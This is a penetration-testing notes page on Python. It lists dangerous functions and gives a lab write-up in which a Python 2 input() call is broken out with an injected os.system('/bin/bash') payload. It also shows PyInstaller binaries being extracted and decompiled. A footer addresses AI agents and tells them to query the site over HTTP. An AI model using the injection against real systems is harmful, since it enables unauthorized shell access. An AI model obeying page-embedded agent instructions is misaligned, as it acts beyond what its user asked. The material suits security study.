# Python

## Dangerous Functions

```python
commands.getoutput, commands.getstatus, commands.getstatusouput, compile, cPickle.load
cPickle.loads, eval, exec, execfile, input, marshal.load, marshal.loads, os.execl, 
os.execle, os.execlp, os.execlpe, os.execv, os.execve, os.execvp, os.execvpe, os.popen
os.popen2, os.popen3, os.popen4, os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe
os.spawnv, os.spawnve, os.spawnvp, os.spawnvpe, os.startfile, os.system, pickle.load
pickle.loads, popen2.popen2, popen2.popen3, popen2.popen4, shelve.open, subprocess.call
subprocess.check_call, subprocess.check_output, subprocess.Popen, yaml.load
```

### Break out, `input()` example

```python
$ cat siteisup_test.py
import requests

url = input("Enter URL here:")
page = requests.get(url)
if page.status_code == 200:
	print "Website is up"
else:
	print "Website is down"
```

```bash
$ ./siteisup
Welcome to 'siteisup.htb' application

Enter URL here:__import__('os').system('/bin/bash')
developer@updown:/home/developer/dev$ id
uid=1002(developer) gid=33(www-data) groups=33(www-data)
```

## PyInstaller / PyInstxtractor

> *“PyInstaller reads a Python script written by you. It analyzes your code to discover every other module and library your script needs in order to execute. Then it collects copies of all those files – including the active Python interpreter! – and puts them with your script in a single folder, or optionally in a single executable file.”*

Single executable files created with PyInstaller can be extracted using [pyinstxtractor](https://github.com/extremecoders-re/pyinstxtractor). Make sure to have run the script with correct python version!

```
PS C:\tools\pyinstxtractor> python3.7.exe pyinstxtractor.py C:\Users\pwn10\Documents\htb\vessel\passwordGenerator       [+] Processing C:\Users\pwn10\Documents\htb\vessel\passwordGenerator
[+] Pyinstaller version: 2.1+
[+] Python version: 3.7
[+] Length of package: 34300131 bytes
[+] Found 95 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_subprocess.pyc
[+] Possible entry point: pyi_rth_pkgutil.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: pyi_rth_pyside2.pyc
[+] Possible entry point: passwordGenerator.pyc
[+] Found 142 files in PYZ archive
[+] Successfully extracted pyinstaller archive: C:\Users\pwn10\Documents\htb\vessel\passwordGenerator

You can now use a python decompiler on the pyc files within the extracted directory
```

**Decompile:**

<pre><code>PS C:\> pip3 install uncompyle6
<strong>PS C:\tools\pyinstxtractor\passwordGenerator_extracted> uncompyle6 passwordGenerator.pyc > passwordGenerator.py
</strong>PS C:\tools\pyinstxtractor\passwordGenerator_extracted> cat passwordGenerator.py
</code></pre>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xpthree.gitbook.io/notes/coding-languages/python.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.